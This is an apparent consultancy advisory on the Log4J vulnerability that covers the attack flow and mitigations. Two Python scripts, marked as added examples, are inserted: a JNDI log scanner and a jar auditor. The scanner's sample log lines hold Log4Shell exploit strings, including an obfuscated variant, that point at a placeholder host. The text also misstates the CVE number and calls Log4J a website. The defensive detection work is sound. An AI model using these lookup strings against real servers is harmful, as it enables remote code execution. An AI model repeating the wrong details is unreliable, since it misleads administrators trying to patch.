New Log4J Cybersecurity Vulnerabilities Identified

By Rex Johnson and Pete Ortega

Steps to protect your business

  • The new Log4J vulnerability (formally CVE-2021-4422) was disclosed on 9 December 2021.
  • The vulnerability affects many websites and can be exploited using remote code execution.
  • You can take steps to mitigate the risk by upgrading or several other options.

What is Log4J?

Log4J (Log for Java) is a Java framework distributed by Apache that facilitates logging service requests, such as distributing log information to various destinations. These destinations could be database servers, other syslog resources, or text files. In short, Log4J is a website that manages and logs online user activity.

Log4J is used by enterprise software and by a wide number of consumer products that are web applications—such as banking sites or sites running on Amazon Web Services (AWS).

How are cyber attackers exploiting this new Log4J vulnerability?

Attackers are using Remote Code Execution (RCE) to exploit this new vulnerability.

RCE is a common class of exploit in which an unauthenticated attacker sends specially crafted requests to a remote server. These requests manipulate the remote server’s functionality and give the remote attacker access to it.

Here’s how an RCE attack works against Log4J software.

  1. The cyber attacker submits a malicious string of code or a URL, which is entered into the logging server and then passed to the log store.
  2. The log server inserts the malicious string into a query that makes a request to the malicious URL.
  3. The requester (you) receives a response from the malicious server containing malicious Java code, which is downloaded and executed.
  4. With this code, an attacker may plant a Remote Access Trojan (RAT) on the Log4J server or use other means to have the infected server connect back to the attacker’s machine.
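The sequence above starts with an attacker-controlled string reaching the logger, so one defensive check is to scan the fields an application logs (user agents, query strings, headers) for the lookup syntax that triggers step 2. The script below is an added example, not part of the original article or any CAI tool; the log lines it scans are constructed for illustration, `placeholder.invalid` stands in for whatever host an attacker would use, and the single-character `${lower:x}`/`${upper:x}` folding handles only the simplest form of case-wrapping seen in public detection rules.

```python
import re

# Constructed sample access-log lines (not from the article). Lines 2 and 3
# carry a JNDI lookup in a user-controlled field; line 4 carries an ordinary
# lookup that is suspicious in user input but is not the JNDI pattern itself.
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://placeholder.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:01:09 +0000] "GET /search?q=${${lower:j}ndi:rmi://placeholder.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.10 - - [10/Dec/2021:10:01:12 +0000] "GET /api?user=${env:USER} HTTP/1.1" 200 64 "-" "python-requests/2.26"',
]

# ${lower:j} / ${upper:J} wrapping a single character: fold it back to the character.
NESTED_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([a-z])\s*\}", re.IGNORECASE)
# The lookup prefix that hands the message to JNDI (steps 2 and 3 above).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Repeatedly fold single-character case lookups until the line stops changing."""
    previous = None
    while previous != line:
        previous = line
        line = NESTED_CASE_LOOKUP.sub(lambda m: m.group(1).lower(), line)
    return line


def contains_jndi_lookup(line: str) -> bool:
    """True when the (normalized) line contains a JNDI lookup prefix."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (1-based line number, line) for every flagged line."""
    return [(number, line) for number, line in enumerate(lines, start=1) if contains_jndi_lookup(line)]


if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

Run it against exported web or application logs one line at a time; a match in a request field is a reason to check whether the service behind it logs that field through a vulnerable Log4j, not proof of compromise. The fourth sample line shows the limit of the check: any `${...}` in user input deserves review, but only the `jndi:` form is what this detector reports.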

What does this mean for your business?

The new Log4J vulnerability only affects you when one of your assets directly engages the vulnerable software. This can happen with a business asset, or with an asset you used with a third-party service for either personal or business reasons.

For example, if you made a purchase from an online store that uses Log4J, the device that accessed that site could be breached by an RCE attack. Even if this was a personal device, it could in turn affect your business security.

The consequences of an attack can be devastating. The cyber attacker could take full control of your system and do whatever they want; this could include encrypting your system, stealing your data, or impersonating legitimate users to attack other people on your system.

As of December 10th, companies such as Tenable have released a shortlist of services known to be vulnerable to the Log4J vulnerability. This list includes notable sites such as Amazon, Apple iCloud, Minecraft, and Tesla.

The Kronos ransomware attack is an example of how malicious actors exploit this new vulnerability. Threat actors exploited services that rely on Log4J, which allowed them to plant malicious software on the systems to encrypt files and led to a ransomware attack.

What can you do to mitigate the risk?

Ever since the vulnerability was discovered, various companies (such as Apache) have focused on releasing patches and upgrades to mitigate it. Apache has released Log4j version 2.15.0, which requires users to upgrade their Java version from version 7 to 8.

However, if upgrading is not immediately possible, three mitigation options are also available. These options do require some technical knowledge of the environment.

  • Option 1 (applicable to Log4j 2.10 or greater)
    • Requires an administrator to go into the configuration and set the formatMsgNoLookups property (the -Dlog4j2.formatMsgNoLookups JVM flag) to true;
  • Option 2 (applicable to Log4j version 2.7 or greater)
    • Requires an administrator to adjust the PatternLayout configuration to use %m{nolookups}; and
  • Option 3 (applicable to all Log4j 2 versions)
    • Requires an administrator to remove the JndiLookup and JndiManager classes from log4j-core.jar.
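Deciding which of the three options applies to a given deployment starts with two facts about each log4j-core.jar on disk: its version and whether the JndiLookup class is still inside it. The script below is an added example, not from the article or from Apache; it audits a jar for those two facts and maps the result onto the options above, using the 2.15.0 upgrade target the article names. The jars it inspects are built in memory as constructed stand-ins (a manifest plus placeholder class entries), so it runs offline; point `audit_jar` at real jar bytes to use it.

```python
import io
import re
import zipfile

# Entry that Option 3 deletes from log4j-core.jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Upgrade target given in the article.
FIXED_VERSION = (2, 15, 0)


def build_sample_jar(version: str, include_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for log4j-core.jar: a manifest plus placeholder class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); a suffix such as '-rc1' is ignored."""
    return tuple(int(part) for part in re.findall(r"\d+", text.split("-")[0]))


def read_implementation_version(zf: zipfile.ZipFile):
    """Version string from the manifest, or None when absent (e.g. shaded jars)."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    match = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
    return match.group(1) if match else None


def audit_jar(jar_bytes: bytes) -> dict:
    """Classify a jar as patched, mitigated (class removed) or vulnerable, with applicable options."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        version_text = read_implementation_version(zf)
        jndi_present = JNDI_LOOKUP_CLASS in zf.namelist()
    version = parse_version(version_text) if version_text else None
    result = {"version": version_text, "jndi_lookup_present": jndi_present, "recommended_options": []}
    if version is not None and version >= FIXED_VERSION:
        result["status"] = "patched"
    elif not jndi_present:
        # The class the JNDI lookup needs is gone: Option 3 has already been applied.
        result["status"] = "mitigated"
    else:
        result["status"] = "vulnerable"
        options = []
        if version is not None and version >= (2, 10):
            options.append(1)   # formatMsgNoLookups property
        if version is not None and version >= (2, 7):
            options.append(2)   # %m{nolookups} in PatternLayout
        options.append(3)       # class removal works on every 2.x; also the fallback when the version is unknown
        result["recommended_options"] = options
    return result


if __name__ == "__main__":
    for ver, keep_class in (("2.14.1", True), ("2.8.2", True), ("2.3", True), ("2.14.1", False), ("2.15.0", True)):
        print(ver, "class present" if keep_class else "class removed", "->", audit_jar(build_sample_jar(ver, keep_class)))
```

The class check is the one that matters: a version string can be missing or misleading in repackaged jars, and embedded copies of log4j-core inside application archives (WAR or EAR files) need the same inspection, so treat a "mitigated" result as applying only to the jar actually examined.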

Next steps

There is still so much to learn about the Log4J vulnerability, and new information will continue to surface in days to come. The best advice we can offer our clients and partners is to follow the recommended guidelines and mitigation plans as closely as possible.

To stay up to date on new Log4J developments and other cybersecurity trends, consider contacting one of CAI’s cybersecurity experts who can answer any questions and start a cybersecurity assessment for your organization.

About the Author...

Rex Johnson is the CAI Cybersecurity Director & Practice Leader. He is a retired Lieutenant Colonel from the US Army and has over 30 years of senior-level experience holding CISSP, CISA, CIPT, PMP, and PCIP certifications.
